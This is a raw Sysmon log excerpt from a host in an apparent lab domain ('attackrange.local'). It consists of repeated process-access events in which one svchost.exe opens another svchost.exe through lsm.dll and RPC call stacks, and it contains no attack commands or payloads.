13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 